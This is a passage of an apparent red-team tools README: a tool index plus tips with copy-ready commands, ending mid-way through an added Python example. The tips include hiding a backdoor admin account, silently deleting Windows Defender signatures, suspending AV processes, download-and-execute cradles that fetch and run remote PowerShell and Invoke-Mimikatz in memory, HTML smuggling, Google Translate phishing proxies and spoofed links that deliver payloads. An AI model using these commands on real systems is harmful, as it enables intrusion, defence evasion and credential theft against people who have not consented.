href=\"#eviltree\"\u003eeviltree\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Tree remake for credential discovery\u003c/i\u003e\u003c/li\u003e\n\t        \u003cli\u003e\u003cb\u003e\u003ca href=\"#seeyoucm-thief\"\u003eSeeYouCM-Thief\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cisco phone systems configuration file parsing\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#mailsniper\"\u003eMailSniper\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Microsoft Exchange Mail Searcher\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpchromium\"\u003eSharpChromium\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cookie, history and saved login chromium extractor\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#dploot\"\u003edploot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e DPAPI 
looting remotely in Python\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eDiscovery\u003c/b\u003e 6 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#pcredz\"\u003ePCredz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Credential discovery PCAP/live interface\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#pingcastle\"\u003ePingCastle\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory assessor\u003c/i\u003e\u003c/li\u003e\n    \t    \u003cli\u003e\u003cb\u003e\u003ca href=\"#seatbelt\"\u003eSeatbelt\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local vulnerability scanner\u003c/i\u003e\u003c/li\u003e\n    \t    \u003cli\u003e\u003cb\u003e\u003ca href=\"#adrecon\"\u003eADRecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory recon\u003c/i\u003e\u003c/li\u003e\n    \t    \u003cli\u003e\u003cb\u003e\u003ca href=\"#adidnsdump\"\u003eadidnsdump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active Directory Integrated DNS dumping\u003c/i\u003e\u003c/li\u003e\n    \t    \u003cli\u003e\u003cb\u003e\u003ca href=\"#scavenger\"\u003escavenger\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Scanning tool for scavenging systems\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eLateral Movement\u003c/b\u003e 12 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#crackmapexec\"\u003ecrackmapexec\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows/Active directory lateral movement toolkit\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#wmiops\"\u003eWMIOps\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WMI remote commands\u003c/i\u003e\u003c/li\u003e\n    
        \u003cli\u003e\u003cb\u003e\u003ca href=\"#powerlessshell\"\u003ePowerLessShell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Remote PowerShell without PowerShell\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#psexec\"\u003ePsExec\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Light-weight telnet-replacement\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#liquidsnake\"\u003eLiquidSnake\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Fileless lateral movement\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#enabling-rdp\"\u003eEnabling RDP\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows RDP enable command\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#upgrading-shell-to-meterpreter\"\u003eUpgrading shell to meterpreter\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Reverse shell improvement\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#forwarding-ports\"\u003eForwarding Ports\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local port forward command\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#jenkins-reverse-shell\"\u003eJenkins reverse shell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Jenkins shell command\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#adfspoof\"\u003eADFSpoof\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Forge AD FS security tokens\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#kerbrute\"\u003ekerbrute\u003c/a\u003e\u003c/b\u003e\u003ci\u003e A tool to perform Kerberos pre-auth bruteforcing\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#coercer\"\u003eCoercer\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Coerce a Windows server to authenticate\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca 
href=\"#wmiops\"\u003eWMIOps\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WMI remote commands\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eCollection\u003c/b\u003e 3 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#bloodhound\"\u003eBloodHound\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory visualisation\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#snaffler\"\u003eSnaffler\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory credential collector\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#linwinpwn\"\u003elinWinPwn\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active Directory Enumeration and Vulnerability checks\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eCommand and Control\u003c/b\u003e 9 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#living-off-trusted-sites-project\"\u003eLiving Off Trusted Sites Project\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Leverage legitimate domains for your C2\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#havoc\"\u003eHavoc\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework\u003c/i\u003e\u003c/li\u003e\n    \t    \u003cli\u003e\u003cb\u003e\u003ca href=\"#covenant\"\u003eCovenant\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (.NET)\u003c/i\u003e\u003c/li\u003e\n    \t    \u003cli\u003e\u003cb\u003e\u003ca href=\"#merlin\"\u003eMerlin\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (Golang)\u003c/i\u003e\u003c/li\u003e\n    \t    \u003cli\u003e\u003cb\u003e\u003ca 
href=\"#metasploit-framework\"\u003eMetasploit Framework\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (Ruby)\u003c/i\u003e\u003c/li\u003e\n    \t    \u003cli\u003e\u003cb\u003e\u003ca href=\"#pupy\"\u003ePupy\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (Python)\u003c/i\u003e\u003c/li\u003e\n    \t    \u003cli\u003e\u003cb\u003e\u003ca href=\"#brute-ratel\"\u003eBrute Ratel\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework ($$$)\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#nimplant\"\u003eNimPlant\u003c/a\u003e\u003c/b\u003e\u003ci\u003e C2 implant written in Nim\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#hoaxshell\"\u003eHoaxshell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell reverse shell\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eExfiltration\u003c/b\u003e 5 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n\t        \u003cli\u003e\u003cb\u003e\u003ca href=\"#dnscat2\"\u003eDnscat2\u003c/a\u003e\u003c/b\u003e\u003ci\u003e C2 via DNS tunneling\u003c/i\u003e\u003c/li\u003e\n\t        \u003cli\u003e\u003cb\u003e\u003ca href=\"#cloakify\"\u003eCloakify\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Data transformation for exfiltration\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#pyexfil\"\u003ePyExfil\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Data exfiltration PoC\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#powershell-rat\"\u003ePowershell RAT\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Python based backdoor\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#gd-thief\"\u003eGD-Thief\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Google drive 
exfiltration\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eImpact\u003c/b\u003e 4 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#conti-pentester-guide-leak\"\u003eConti Pentester Guide Leak\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Conti ransomware group affiliate toolkit\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#slowloris\"\u003eSlowLoris\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Simple denial of service\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#usbkill\"\u003eusbkill\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Anti-forensic kill-switch\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#keytap\"\u003eKeytap\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Get pressed keyboard keys from typing audio\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n    \nRed Team Tips\n====================\n\n*Learn from Red Teamers with a collection of Red Teaming Tips. 
These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.*\n\n### [🔙](#tool-list)Improved HTML smuggling with a mouse move event listener\n\n**Description:** *'Qakbot added an EventListener for mouse movement to the HTML smuggling attachment for anti-evasion; in sandboxes the zip won't drop.'*\n\n**Credit:** [@pr0xylife](https://x.com/pr0xylife)\n\n**Link:** [Twitter](https://x.com/pr0xylife/status/1598410732516802563)\n\n### [🔙](#tool-list)Google Translate for phishing\n\n**Description:** *A successful credential-stealing phishing page, proxied via Google Translate's page view functionality.*\n\n**Credit:** [@malmoeb](https://x.com/malmoeb)\n\n**Link:** [Twitter](https://x.com/malmoeb/status/1671106885590630400)\n\n### [🔙](#tool-list)Hiding the local admin account\n\n```bash\n# The value name (here alh4zr3d) is the account to hide from the logon screen\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /t REG_DWORD /v alh4zr3d /d 0 /f\n```\n\n**Description:** *'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)\n\n### [🔙](#tool-list)Cripple Windows Defender by deleting signatures\n\n```bash\n# Run from an elevated prompt\n\"%ProgramFiles%\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\n```\n\n**Description:** *'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1611005101262389250)\n\n### [🔙](#tool-list)Enable multiple RDP sessions per user\n\n```bash\n# The key name contains a space, so it must be quoted\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f\n```\n\n**Description:** *'Sometimes you want to log in to a host 
via RDP or similar, but your user has an active session. Enable multiple sessions per user.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)\n\n### [🔙](#tool-list)Sysinternals PsExec.exe local alternative\n\n```bash\n# The whole remote command line is the single argument to 'create'\nwmic.exe /node:10.1.1.1 /user:username /password:pass process call create \"cmd.exe /c command\"\n```\n\n**Description:** *'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'*\n\n**Credit:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)\n\n**Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1607473627922063360)\n\n### [🔙](#tool-list)Living off the land port scanner\n\n```powershell\n# Connect() throws on closed ports; those errors are discarded by 2\u003e$null, so only open ports are printed\n0..65535 | % {echo ((New-Object Net.Sockets.TcpClient).Connect(\"\u003ctgt_ip\u003e\",$_)) \"Port $_ open\"} 2\u003e$null\n```\n\n**Description:** *'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)\n\n### [🔙](#tool-list)Proxy aware PowerShell DownloadString\n\n```powershell\n$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString(\"\u003curl\u003e\")\n```\n\n**Description:** *'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. 
Use this one.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1596192664398966785)\n\n### [🔙](#tool-list)Looking for internal endpoints in browser bookmarks\n\n```bash\n# findstr ORs space-separated terms; the /v filter drops the \"type\" lines\ntype \"C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks.bak\" | findstr \"name url\" | findstr /v \"type\"\n```\n\n**Description:** *'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)\n\n### [🔙](#tool-list)Query DNS records for enumeration\n\n```powershell\n# Requires the DnsServer module (RSAT: DNS Server Tools)\nGet-DnsServerResourceRecord -RRType A -ZoneName \u003czone FQDN\u003e -ComputerName \u003cDNS server hostname\u003e\n```\n\n**Description:** *'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1587132627823181824)\n\n### [🔙](#tool-list)Unquoted service paths without PowerUp\n\n```powershell\n# Auto-start services outside C:\\Windows whose binary path is unquoted and contains a space\nGet-CimInstance -Class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where-Object {$_.StartMode -eq \"Auto\" -and $_.PathName -notlike \"C:\\Windows*\" -and $_.PathName -notlike '\"*' -and $_.PathName -match ' '} | Select-Object PathName,DisplayName,Name\n```\n\n**Description:** *'Finding unquoted service paths without PowerUp'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)\n\n### [🔙](#tool-list)Bypass a disabled command prompt with /k\n\n```bash\n# Win+R (To bring up Run Box)\ncmd.exe /k \"whoami\"\n```\n\n**Description:** *'This command prompt has been disabled by your administrator...' 
This message can usually be seen in environments such as kiosk PCs; a quick, hacky workaround is to use /k via the Windows Run box. This carries out the command and then shows the restriction message, allowing command execution.*\n\n**Credit:** Martin Sohn Christensen\n\n**Link:** [Blog](https://improsec.com/tech-blog/the-command-prompt-has-been-disabled-by-your-administrator-press-any-key-to-continue-or-use-these-weird-tricks-to-bypass-admins-will-hate-you)\n\n### [🔙](#tool-list)Stop Windows Defender deleting mimikatz.exe\n\n```powershell\n# Loads the Invoke-Mimikatz script into memory (URL defanged) instead of dropping mimikatz.exe to disk\n(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;Invoke-Mimikatz\n```\n\n**Description:** *'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'*\n\n**Credit:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)\n\n**Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)\n\n### [🔙](#tool-list)Check if you are in a virtual machine\n\n```bash\nreg query HKLM\\SYSTEM /s | findstr /i \"VirtualBox VBOX VMware\"\n```\n\n**Description:** *'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'*\n\n**Credit:** [@dmcxblue](https://twitter.com/dmcxblue)\n\n**Link:** [Twitter](https://twitter.com/dmcxblue/status/1366779034672136194)\n\n### [🔙](#tool-list)Enumerate AppLocker rules\n\n```powershell\n(Get-AppLockerPolicy -Local).RuleCollections\n\nGet-ChildItem -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\SrpV2 -Recurse\n\nreg query HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\SrpV2\\Exe\\\n```\n\n**Description:** *'AppLocker can be a pain. 
Enumerate to see how painful'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)\n\n### [🔙](#tool-list)CMD shortcut with 6 pixels via mspaint\n\n![image](https://user-images.githubusercontent.com/100603074/223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png)\n\n1. Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels\n2. Zoom in to make the following tasks easier\n3. Using the colour picker, set the pixel values to (from left to right):\n    - 1st: R: 10, G: 0, B: 0\n    - 2nd: R: 13, G: 10, B: 13\n    - 3rd: R: 100, G: 109, B: 99\n    - 4th: R: 120, G: 101, B: 46\n    - 5th: R: 0, G: 0, B: 101\n    - 6th: R: 0, G: 0, B: 0\n4. Save it as 24-bit Bitmap (*.bmp;*.dib)\n5. Change its extension from .bmp to .bat and run it.\n\nWhy it works: a 24-bit BMP stores each pixel as three bytes in B, G, R order, so the six pixels above are written out as `00 00 0A 0D 0A 0D 63 6D 64 2E 65 78 65 00 00 00 00 00`, i.e. line breaks followed by the ASCII text `cmd.exe`, directly after the 54-byte BMP header. When the renamed file is run as a batch script, the header bytes fail as an unrecognised command and the following line launches cmd.exe.\n\n**Description:** *'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'*\n\n**Credit:** [PenTestPartners](https://www.pentestpartners.com/)\n\n**Link:** [Blog](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell)\n\n### [🔙](#tool-list)Link spoofing with the preventDefault JavaScript method\n\n![image](https://user-images.githubusercontent.com/100603074/223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png)\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n  \u003chead\u003e\n    \u003cmeta charset=\"UTF-8\"\u003e\n    \u003ctitle\u003ePreventDefault Example\u003c/title\u003e\n  \u003c/head\u003e\n  \u003cbody\u003e\n    \u003ca href=\"https://google.com\" onclick=\"event.preventDefault(); window.location.href = 'https://bing.com';\"\u003eGo to Google\u003c/a\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n```\n\n**Description:** *Threat 
actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the `preventDefault()` JavaScript method you can make the hover link display a legitimate destination (`google.com`) while the click handler redirects the victim to your malicious link (`bing.com` in the example). Great for getting victims to download payloads via a controlled site.*\n\n**Link:** [preventDefault Docs](https://developer.mozilla.org/en-US/docs/Web/API/Event/preventDefault)\n\n### [🔙](#tool-list)Check SMB firewall rules with Responder\n\n![image](https://user-images.githubusercontent.com/100603074/229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png)\n\n```powershell\nCopy-Item -Path \"C:\\tmp\\\" -Destination \"\\\\\u003cip_running_responder\u003e\\c$\"\n```\n\n**Description:** *'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: `Copy-Item -Path \"C:\\tmp\\\" -Destination \"\\\\\u003cip_running_responder\u003e\\c$\"`. If Responder could capture the hash, the firewall allows outgoing SMB connections'*\n\n**Credit:** [@malmoeb](https://twitter.com/malmoeb)\n\n**Link:** [Twitter](https://twitter.com/malmoeb/status/1628272928855826433)\n\n### [🔙](#tool-list)Disable AV with SysInternals PsSuspend\n\n![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/4519f5ad-c177-4550-b9af-238fa73ad66e)\n\n**Description:** *Using the Microsoft Sysinternals tool PsSuspend.exe it is possible to suspend some AV service processes. 
The Microsoft-signed tool can be passed the PID or name of a running process; it suspends the process via the NtSuspendProcess Windows API.*\n\n**Related Blog Post:** [Bypassing AV via Process Suspension with PsSuspend.exe](https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7)\n\n**Link:** [Twitter](https://twitter.com/0gtweet/status/1638069413717975046)\n\nReconnaissance\n====================\n\n### [🔙](#tool-list)[spiderfoot](https://github.com/smicallef/spiderfoot)\n\nSpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.\n\nSpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet.\n\n**Install:** \n\n```bash\nwget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz\ntar zxvf v4.0.tar.gz\ncd spiderfoot-4.0\npip3 install -r requirements.txt\n```\n\nFor full installation instructions see [here](https://github.com/smicallef/spiderfoot?tab=readme-ov-file#installing--running).\n\n**Usage:** \n\n```bash\n# Start the web UI, listening on 127.0.0.1:5001\npython3 ./sf.py -l 127.0.0.1:5001\n```\n\nLots of usage tutorial videos [here](https://asciinema.org/~spiderfoot)\n\n![spiderfoot](https://github.com/user-attachments/assets/1ce26a9e-6fa5-4987-9aea-4943b9c2efec)\n\n*Image used from https://github.com/smicallef/spiderfoot*\n\n### [🔙](#tool-list)[reconftw](https://github.com/six2dez/reconftw)\n\nreconFTW automates the entire process of reconnaissance for you. 
It performs subdomain enumeration along with various vulnerability checks, gathering the maximum information about your target.\n\n**Install:** \n\n```bash\ngit clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh\n```\n\nFor full installation instructions see [here](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide).\n\n**Usage:** \n\n```bash\n# Single target domain\n./reconftw.sh -d target.com -r\n\n# One target with multiple domains\n./reconftw.sh -m target -l domains.txt -r\n\n# Passive recon\n./reconftw.sh -d target.com -p\n\n# Perform all checks and exploitations\n./reconftw.sh -d target.com -a\n```\n\nFor full usage instructions see [here](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide).\n\n![reconftw](https://github.com/user-attachments/assets/1a5abeb5-776d-4c10-a02c-934e1662d817)\n\n*Image used from https://www.youtube.com/watch?v=TQmDAtkD1Wo*\n\n### [🔙](#tool-list)[subzy](https://github.com/PentestPad/subzy)\n\nSubdomain takeover tool that works by matching response fingerprints from [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md).\n\n**Install:** \n\n```bash\ngo install -v github.com/PentestPad/subzy@latest\n```\n\nFor full installation instructions see [here](https://github.com/PentestPad/subzy?tab=readme-ov-file#installation).\n\n**Usage:** \n\n```bash\n# List of subdomains\n./subzy run --targets list.txt\n\n# Single or multiple targets\n./subzy run --target test.google.com\n./subzy run --target test.google.com,https://test.yahoo.com\n```\n\n![subzy](https://github.com/user-attachments/assets/d06bff41-8c0f-4d3d-b42e-1221b9866332)\n\n*Image used from https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/*\n\n### [🔙](#tool-list)[smtp-user-enum](https://github.com/cytopia/smtp-user-enum)\n\nSMTP user enumeration via VRFY, EXPN and RCPT with clever timeout, retry and reconnect functionality.\n\n**Install:** 
\n\n```bash\npip install smtp-user-enum\n```\n\n**Usage:** \n\n```bash\nsmtp-user-enum [options] -u/-U host port\nsmtp-user-enum --help\nsmtp-user-enum --version\n```\n\n![smtp-user-enum](https://github.com/user-attachments/assets/2a965690-52f3-412a-90e3-54dd69e0b275)\n\n*Image used from https://www.kali.org/tools/smtp-user-enum/*\n\n### [🔙](#tool-list)crt.sh -\u003e httprobe -\u003e EyeWitness\n\nI have put together a bash one-liner that: \n- Passively collects a list of subdomains from certificate associations ([crt.sh](https://crt.sh/))\n- Actively requests each subdomain to verify its existence ([httprobe](https://github.com/tomnomnom/httprobe))\n- Actively screenshots each subdomain for manual review ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))\n\n**Usage:** \n\n```bash\n# crt.sh table cells -\u003e names containing the domain -\u003e de-duplicated -\u003e probed for HTTP(S) -\u003e screenshotted\ndomain=DOMAIN_COM;rand=$RANDOM;curl -fsSL \"https://crt.sh/?q=${domain}\" | pup 'td text{}' | grep \"${domain}\" | sort -u | httprobe \u003e /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web\n```\n\n*Note: You must have [httprobe](https://github.com/tomnomnom/httprobe), [pup](https://github.com/EricChiang/pup) and [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness) installed and change 'DOMAIN_COM' to the target domain. 
You are able to run this script concurrently in terminal windows if you have multiple target root domains*\n\n![image](https://user-images.githubusercontent.com/100603074/192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png)\n\n![image](https://user-images.githubusercontent.com/100603074/192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png)\n\n### [🔙](#tool-list)[jsendpoints](https://twitter.com/renniepak/status/1602620834463588352)\n\nA JavaScript bookmarklet for extracting all webpage endpoint links on a page.\n\nCreated by [@renniepak](https://twitter.com/renniepak), this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.\n\n```javascript\njavascript:(function(){var scripts=document.getElementsByTagName(\"script\"),regex=/(?\u003c=(\\\"|\\'|\\`))\\/[a-zA-Z0-9_?\u0026=\\/\\-\\#\\.]*(?=(\\\"|\\'|\\`))/g;const results=new Set;for(var i=0;i\u003cscripts.length;i++){var t=scripts[i].src;\"\"!=t\u0026\u0026fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log(\"An error occurred: \",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+\"\u003cbr\u003e\")})}setTimeout(writeResults,3e3);})();\n```\n\n**Usage (Bookmarklet)** \n\nCreate a bookmarklet...\n\n- `Right click your bookmark bar`\n- `Click 'Add Page'`\n- `Paste the above Javascript in the 'url' box`\n- `Click 'Save'`\n\n...then visit the victim page in the browser and click the bookmarklet.\n\n![image](https://user-images.githubusercontent.com/100603074/207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png)\n\n**Usage (Console)** \n\nPaste the above Javascript into the console window `F12` and press enter. 
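The bookmarklet's extraction logic, as an added Python example that is not part of the bookmarklet, its author's code or this README: it runs offline over constructed page markup and script bodies, applies the same quoted-path regex, and goes one step further than the bookmarklet by separating protocol-relative references to other hosts (`//cdn.example.net/lib.js`, which the regex also matches) from same-origin endpoints, which it resolves against the page URL. The host names, paths and script contents below are constructed for illustration.

```python
import re
from urllib.parse import urljoin, urlsplit

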